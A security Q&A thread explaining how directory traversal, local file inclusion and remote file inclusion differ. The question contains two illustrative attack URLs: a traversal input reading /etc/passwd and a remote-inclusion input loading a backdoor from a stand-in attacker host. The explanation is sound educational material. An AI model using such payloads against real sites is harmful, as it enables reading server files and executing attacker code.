# What is the difference between local file inclusion (LFI) and remote file inclusion (RFI)?

Tags: web-application, vulnerability, terminology, file-inclusion

Based on [this previous question](https://security.stackexchange.com/a/11882/160351), it seems like the difference between directory traversal and file inclusion is as follows:

**Directory traversal**

- Improper validation of user input leads to *read access of server resource*.
- Example: `http://www.example.com?file=../../etc/passwd`

**File inclusion**

- Improper validation of user input leads to *the loading of an external resource into the server and execution therein*.
- Example: `http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor`

[This link](https://www.incapsula.com/web-application-security/rfi-remote-file-inclusion.html), however, describes these concepts using the words **local file inclusion** and **remote file inclusion**.

So, is the first example

- **directory traversal vs. file inclusion**

the same as the second example

- **local file inclusion vs. remote file inclusion**

i.e. LFI/RFI is just different terminology for the same thing?

Answer (score 5, accepted):

Your confusion stems from your over-broad understanding of directory traversal.

Traversal means one can read from another directory. Not specifically that one can read a file.

LFI is reading a local file, either in the current working directory or, using traversal, a file in another directory.

RFI is including a file from an external source.

It is possible to have an LFI vulnerability without there being a directory traversal vulnerability (files local to the current context). And, technically, it is possible that there can be a traversal vulnerability that does not result in a LFI.

Comment: "LFI is reading a local file" vs. "RFI is including a file" --> the atomic distinction I was looking for; cheers

Comment: @ZachValenta I might amend your statement that "LFI is reading a local file" vs. "RFI is reading a remote file". "Including" is merely a technical implementation of "reading".